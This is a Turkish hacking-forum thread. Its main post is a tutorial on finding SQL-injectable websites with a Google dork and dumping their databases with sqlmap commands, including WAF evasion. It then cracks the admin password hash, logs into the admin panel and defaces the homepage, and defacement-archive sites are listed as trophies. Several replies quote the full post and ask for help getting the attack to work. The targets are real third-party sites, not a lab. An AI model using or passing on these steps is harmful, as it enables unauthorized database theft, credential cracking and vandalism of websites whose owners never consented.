# SQL Açık Tespiti-SQLMAP İle Database Çekimi-İndex Basma #

I AM EAC0D3Rx

Black Hat Lider Yardımcısı
17 Eyl 2023
1,682
890
Matrix
Elinize sağlık, güncelliğini yitirmemesi için yorum yapmak istedim. Bilmeyen ve yeni başlayanlar için bütün soruların cevabı var
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,533
1,140
Anıtkabir
Merhaba Bugün Sql Açık Tespiti-Sqlmap İle Database Çekimi Yapacağız Ve En Sonunda Databasesini Çektiğimiz Siteye İndex Atacağız.

Evet Sqlmap İle Site Hacklemek Gibi Birçok Konu Var Fakat Çoğunda İndex Atmayı Değil Sadece Database Çekmeyi Göstermişler Bende Hepsini Tek Bir Konuda Anlatayım Dedim.


1-
DORK TARAMA VE SQL AÇIK TESPİTİ
İlk Öncelikle Dork Oluşturmayı Bilmeyenler Ghost Hocamın Konusuna Bakabilirler; https://www.turkhackteam.org/konular/dork-yazma-ve-genel-terimler.2013922/

Tarama Yapacağım Dorkum
Kod:
inurl:product.php?cat= site:my
Olacak Taramaya Başlayalım.

jh66rru.png


Evet Aramaya Başladıktan Sonra Herhangi Birtanesine Giriyorum.

c3hzx52.png


Sonrasında İse Girdiğim Sitedeki Cat Değerinin Yanına ' İşareti Koyuyorum.

n7ajmyg.png



' Koyduktan Sonra, sql syntax hatası veriyorsa,sayfa gidiyorsa, veya Herhangi Bir Veri Kaybı Oluyorsa
Sitede SQL Açığı Olma İhtimali Vardır. Benim Girdiğim Sitede ' Koyunca SQL Syntax Error Verdi
(Bu Hatadan Yola Çıkarak Güzel Dorklar Oluşturup Birsürü Açıklı Site Bulabilirsiniz)


2- DATABASE ÇEKİMİ

Linux İşletim Sistemlerinde SQLMAP kurulu olarak geliyor zaten

Windows İçin Buradan İndirebilirsiniz

Linux İşletim Sistemimde Terminalimi Açıyorum

4z5myon.png


Kod:
sqlmap -u hedefsite.com --random-agent --dbs --batch

--random-agent: waf ve ıps'i atlatmak için rastgele bir browser agent kullanır.
--dbs : sitenin databasesini çeker
--batch : Sqlmapin Sorduğu Y/N Sorularına Otomatik Cevap Verir

Enter'a bastım ve çekmeye başladı

ol4dk49.png


DB'leri Çekti Şimdi İse Bunların İçindeki Tablolara Bakacağız.

Kod:
sqlmap -u hedefsite.com --tables -D dbismi --batch

3slad4v.png


Evet Çektik Tabloları:

ls7bvxn.png


Biz İndex Basacağımızdan Dolayı Admin Bilgileri Lazım Onun Yüzünden Direk User'ı Dump Ediyorum(içindeki verileri çekmek)

Kod:
sqlmap -u hedefsite.com --columns -T tabloismi -D dbismi --batch --dump


54b8zib.png



çıktımız şu şekilde olacak:

5z7vfbj.jpg


Sizin Çektiğiniz Bu Kadar Karmaşık Olmayabilir 2. Satırdaki Hashli Şifreyi hashes.com'dan Kırmayı Denedim Ve Başarılı Oldum.

9c72xzj.jpg


İNDEX BASMA


Sırada Admin Paneli Bulmak Var Sitenin Sonunda /admin.php,/admin/login.php denedim ve 2. sinde başarılı oldum sırada
sadece kullanıcı adı şifreyi girerek index basmak kaldı terminalimdeki kullanıcı adlarını sıra sıra denedim ve sonunda biri doğru çıktı


c728hs6.png


Login Diyerek Panele Giriyoruz.

kximov1.png


Buradan Pages Settings'e Giriyoruz sizin girdiğiniz panelde pages şeklinde yazabilir.

ggd0aj2.png


şimdi ise sadece index kodlarını yapıştırmak var index kodlarını yapıştırıyoruz ve ana sayfaya dönüyoruz

poeqa5y.png


(Bazı Yerleri Blurlamamın Sebebi Yeni Başlayan Ve Öğrenmek İsteyenlerin Direk Girmesi Değil Öğrenerek Yapmasıdır)-(ANLAYAMADIĞINIZ YERLERİ ÖZELDEN SORABİLİRSİNİZ)
ZONE:
Mirror-h
Ownzyou
archive.is
F3beZqk.png


m9RCVr.png
G3oa9Tz.png
Elinize sağlık güzel konu olmuş hocam
 

musto9412

Yeni üye
21 Ağu 2023
8
3
Hocam hashes de onay aldin mi sifreyi nerden nasil bulabilirim
1 hashes were checked: 1 found 0 not found
Aldigim sonuc bu ama sifreyi nasil gorebilecegimi bilmiyorum yardimci olabilirmisiniz ?

e742c63f03ab602f2b38433ffc28b5145ba1332d
Kod su sekilde
 
Moderatör tarafında düzenlendi:

XDSD

Üye
5 Haz 2022
155
44
elinize sağlık güzel konu olmuş , bu konuya vakit ayırdığınız için teşekkürler
 

flex1n

Yeni üye
12 Kas 2023
36
7
bir tek bendemi olmuyor bende db göstermiyor

Merhaba Bugün Sql Açık Tespiti-Sqlmap İle Database Çekimi Yapacağız Ve En Sonunda Databasesini Çektiğimiz Siteye İndex Atacağız.

Evet Sqlmap İle Site Hacklemek Gibi Birçok Konu Var Fakat Çoğunda İndex Atmayı Değil Sadece Database Çekmeyi Göstermişler Bende Hepsini Tek Bir Konuda Anlatayım Dedim.


1-
DORK TARAMA VE SQL AÇIK TESPİTİ
İlk Öncelikle Dork Oluşturmayı Bilmeyenler Ghost Hocamın Konusuna Bakabilirler; Dork Yazma ve Genel Terimler

Tarama Yapacağım Dorkum
Kod:
inurl:product.php?cat= site:my
Olacak Taramaya Başlayalım.

jh66rru.png


Evet Aramaya Başladıktan Sonra Herhangi Birtanesine Giriyorum.

c3hzx52.png


Sonrasında İse Girdiğim Sitedeki Cat Değerinin Yanına ' İşareti Koyuyorum.

n7ajmyg.png



' Koyduktan Sonra, sql syntax hatası veriyorsa,sayfa gidiyorsa, veya Herhangi Bir Veri Kaybı Oluyorsa
Sitede SQL Açığı Olma İhtimali Vardır. Benim Girdiğim Sitede ' Koyunca SQL Syntax Error Verdi
(Bu Hatadan Yola Çıkarak Güzel Dorklar Oluşturup Birsürü Açıklı Site Bulabilirsiniz)


2- DATABASE ÇEKİMİ

Linux İşletim Sistemlerinde SQLMAP kurulu olarak geliyor zaten

Windows İçin Buradan İndirebilirsiniz

Linux İşletim Sistemimde Terminalimi Açıyorum

4z5myon.png


Kod:
sqlmap -u hedefsite.com --random-agent --dbs --batch

--random-agent: waf ve ıps'i atlatmak için rastgele bir browser agent kullanır.
--dbs : sitenin databasesini çeker
--batch : Sqlmapin Sorduğu Y/N Sorularına Otomatik Cevap Verir

Enter'a bastım ve çekmeye başladı

ol4dk49.png


DB'leri Çekti Şimdi İse Bunların İçindeki Tablolara Bakacağız.

Kod:
sqlmap -u hedefsite.com --tables -D dbismi --batch

3slad4v.png


Evet Çektik Tabloları:

ls7bvxn.png


Biz İndex Basacağımızdan Dolayı Admin Bilgileri Lazım Onun Yüzünden Direk User'ı Dump Ediyorum(içindeki verileri çekmek)

Kod:
sqlmap -u hedefsite.com --columns -T tabloismi -D dbismi --batch --dump


54b8zib.png



çıktımız şu şekilde olacak:

5z7vfbj.jpg


Sizin Çektiğiniz Bu Kadar Karmaşık Olmayabilir 2. Satırdaki Hashli Şifreyi hashes.com'dan Kırmayı Denedim Ve Başarılı Oldum.

9c72xzj.jpg


İNDEX BASMA


Sırada Admin Paneli Bulmak Var Sitenin Sonunda /admin.php,/admin/login.php denedim ve 2. sinde başarılı oldum sırada
sadece kullanıcı adı şifreyi girerek index basmak kaldı terminalimdeki kullanıcı adlarını sıra sıra denedim ve sonunda biri doğru çıktı


c728hs6.png


Login Diyerek Panele Giriyoruz.

kximov1.png


Buradan Pages Settings'e Giriyoruz sizin girdiğiniz panelde pages şeklinde yazabilir.

ggd0aj2.png


şimdi ise sadece index kodlarını yapıştırmak var index kodlarını yapıştırıyoruz ve ana sayfaya dönüyoruz

poeqa5y.png


(Bazı Yerleri Blurlamamın Sebebi Yeni Başlayan Ve Öğrenmek İsteyenlerin Direk Girmesi Değil Öğrenerek Yapmasıdır)-(ANLAYAMADIĞINIZ YERLERİ ÖZELDEN SORABİLİRSİNİZ)
ZONE:
Mirror-h
Ownzyou
archive.is
F3beZqk.png


m9RCVr.png
G3oa9Tz.png
ellerinize sağlık güzel olmuş ama ben şu hatayı alıyorum :

SQLMAP Cant establish SSL Connection Hatası​

 

sratel38

Yeni üye
17 Ara 2022
23
5
Merhaba Bugün Sql Açık Tespiti-Sqlmap İle Database Çekimi Yapacağız Ve En Sonunda Databasesini Çektiğimiz Siteye İndex Atacağız.

Evet Sqlmap İle Site Hacklemek Gibi Birçok Konu Var Fakat Çoğunda İndex Atmayı Değil Sadece Database Çekmeyi Göstermişler Bende Hepsini Tek Bir Konuda Anlatayım Dedim.


1-
DORK TARAMA VE SQL AÇIK TESPİTİ
İlk Öncelikle Dork Oluşturmayı Bilmeyenler Ghost Hocamın Konusuna Bakabilirler; Dork Yazma ve Genel Terimler

Tarama Yapacağım Dorkum
Kod:
inurl:product.php?cat= site:my
Olacak Taramaya Başlayalım.

jh66rru.png


Evet Aramaya Başladıktan Sonra Herhangi Birtanesine Giriyorum.

c3hzx52.png


Sonrasında İse Girdiğim Sitedeki Cat Değerinin Yanına ' İşareti Koyuyorum.

n7ajmyg.png



' Koyduktan Sonra, sql syntax hatası veriyorsa,sayfa gidiyorsa, veya Herhangi Bir Veri Kaybı Oluyorsa
Sitede SQL Açığı Olma İhtimali Vardır. Benim Girdiğim Sitede ' Koyunca SQL Syntax Error Verdi
(Bu Hatadan Yola Çıkarak Güzel Dorklar Oluşturup Birsürü Açıklı Site Bulabilirsiniz)


2- DATABASE ÇEKİMİ

Linux İşletim Sistemlerinde SQLMAP kurulu olarak geliyor zaten

Windows İçin Buradan İndirebilirsiniz

Linux İşletim Sistemimde Terminalimi Açıyorum

4z5myon.png


Kod:
sqlmap -u hedefsite.com --random-agent --dbs --batch

--random-agent: waf ve ıps'i atlatmak için rastgele bir browser agent kullanır.
--dbs : sitenin databasesini çeker
--batch : Sqlmapin Sorduğu Y/N Sorularına Otomatik Cevap Verir

Enter'a bastım ve çekmeye başladı

ol4dk49.png


DB'leri Çekti Şimdi İse Bunların İçindeki Tablolara Bakacağız.

Kod:
sqlmap -u hedefsite.com --tables -D dbismi --batch

3slad4v.png


Evet Çektik Tabloları:

ls7bvxn.png


Biz İndex Basacağımızdan Dolayı Admin Bilgileri Lazım Onun Yüzünden Direk User'ı Dump Ediyorum(içindeki verileri çekmek)

Kod:
sqlmap -u hedefsite.com --columns -T tabloismi -D dbismi --batch --dump


54b8zib.png



çıktımız şu şekilde olacak:

5z7vfbj.jpg


Sizin Çektiğiniz Bu Kadar Karmaşık Olmayabilir 2. Satırdaki Hashli Şifreyi hashes.com'dan Kırmayı Denedim Ve Başarılı Oldum.

9c72xzj.jpg


İNDEX BASMA


Sırada Admin Paneli Bulmak Var Sitenin Sonunda /admin.php,/admin/login.php denedim ve 2. sinde başarılı oldum sırada
sadece kullanıcı adı şifreyi girerek index basmak kaldı terminalimdeki kullanıcı adlarını sıra sıra denedim ve sonunda biri doğru çıktı


c728hs6.png


Login Diyerek Panele Giriyoruz.

kximov1.png


Buradan Pages Settings'e Giriyoruz sizin girdiğiniz panelde pages şeklinde yazabilir.

ggd0aj2.png


şimdi ise sadece index kodlarını yapıştırmak var index kodlarını yapıştırıyoruz ve ana sayfaya dönüyoruz

poeqa5y.png


(Bazı Yerleri Blurlamamın Sebebi Yeni Başlayan Ve Öğrenmek İsteyenlerin Direk Girmesi Değil Öğrenerek Yapmasıdır)-(ANLAYAMADIĞINIZ YERLERİ ÖZELDEN SORABİLİRSİNİZ)
ZONE:
Mirror-h
Ownzyou
archive.is
F3beZqk.png


m9RCVr.png
G3oa9Tz.png
merhaba, ilk kez siteye index basmak için kolları sıvadım sqlmap ile siteleri zorladım fakat hangisini denediysem timeout hatası veriyor ne siteye girebiliyorum nede sqlmapden işleme devam edebiliyorum yardımcı olursanız sevinirim iyi günler
 

ACE Veen

Uzman üye
4 Şub 2023
1,097
551
Belirsiz
Merhaba Bugün Sql Açık Tespiti-Sqlmap İle Database Çekimi Yapacağız Ve En Sonunda Databasesini Çektiğimiz Siteye İndex Atacağız.

Evet Sqlmap İle Site Hacklemek Gibi Birçok Konu Var Fakat Çoğunda İndex Atmayı Değil Sadece Database Çekmeyi Göstermişler Bende Hepsini Tek Bir Konuda Anlatayım Dedim.


1-
DORK TARAMA VE SQL AÇIK TESPİTİ
İlk Öncelikle Dork Oluşturmayı Bilmeyenler Ghost Hocamın Konusuna Bakabilirler; Dork Yazma ve Genel Terimler

Tarama Yapacağım Dorkum
Kod:
inurl:product.php?cat= site:my
Olacak Taramaya Başlayalım.

jh66rru.png


Evet Aramaya Başladıktan Sonra Herhangi Birtanesine Giriyorum.

c3hzx52.png


Sonrasında İse Girdiğim Sitedeki Cat Değerinin Yanına ' İşareti Koyuyorum.

n7ajmyg.png



' Koyduktan Sonra, sql syntax hatası veriyorsa,sayfa gidiyorsa, veya Herhangi Bir Veri Kaybı Oluyorsa
Sitede SQL Açığı Olma İhtimali Vardır. Benim Girdiğim Sitede ' Koyunca SQL Syntax Error Verdi
(Bu Hatadan Yola Çıkarak Güzel Dorklar Oluşturup Birsürü Açıklı Site Bulabilirsiniz)


2- DATABASE ÇEKİMİ

Linux İşletim Sistemlerinde SQLMAP kurulu olarak geliyor zaten

Windows İçin Buradan İndirebilirsiniz

Linux İşletim Sistemimde Terminalimi Açıyorum

4z5myon.png


Kod:
sqlmap -u hedefsite.com --random-agent --dbs --batch

--random-agent: waf ve ıps'i atlatmak için rastgele bir browser agent kullanır.
--dbs : sitenin databasesini çeker
--batch : Sqlmapin Sorduğu Y/N Sorularına Otomatik Cevap Verir

Enter'a bastım ve çekmeye başladı

ol4dk49.png


DB'leri Çekti Şimdi İse Bunların İçindeki Tablolara Bakacağız.

Kod:
sqlmap -u hedefsite.com --tables -D dbismi --batch

3slad4v.png


Evet Çektik Tabloları:

ls7bvxn.png


Biz İndex Basacağımızdan Dolayı Admin Bilgileri Lazım Onun Yüzünden Direk User'ı Dump Ediyorum(içindeki verileri çekmek)

Kod:
sqlmap -u hedefsite.com --columns -T tabloismi -D dbismi --batch --dump


54b8zib.png



çıktımız şu şekilde olacak:

5z7vfbj.jpg


Sizin Çektiğiniz Bu Kadar Karmaşık Olmayabilir 2. Satırdaki Hashli Şifreyi hashes.com'dan Kırmayı Denedim Ve Başarılı Oldum.

9c72xzj.jpg


İNDEX BASMA


Sırada Admin Paneli Bulmak Var Sitenin Sonunda /admin.php,/admin/login.php denedim ve 2. sinde başarılı oldum sırada
sadece kullanıcı adı şifreyi girerek index basmak kaldı terminalimdeki kullanıcı adlarını sıra sıra denedim ve sonunda biri doğru çıktı


c728hs6.png


Login Diyerek Panele Giriyoruz.

kximov1.png


Buradan Pages Settings'e Giriyoruz sizin girdiğiniz panelde pages şeklinde yazabilir.

ggd0aj2.png


şimdi ise sadece index kodlarını yapıştırmak var index kodlarını yapıştırıyoruz ve ana sayfaya dönüyoruz

poeqa5y.png


(Bazı Yerleri Blurlamamın Sebebi Yeni Başlayan Ve Öğrenmek İsteyenlerin Direk Girmesi Değil Öğrenerek Yapmasıdır)-(ANLAYAMADIĞINIZ YERLERİ ÖZELDEN SORABİLİRSİNİZ)
ZONE:
Mirror-h
Ownzyou
archive.is
F3beZqk.png


m9RCVr.png
G3oa9Tz.png
resimleri yenilermisiniz
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.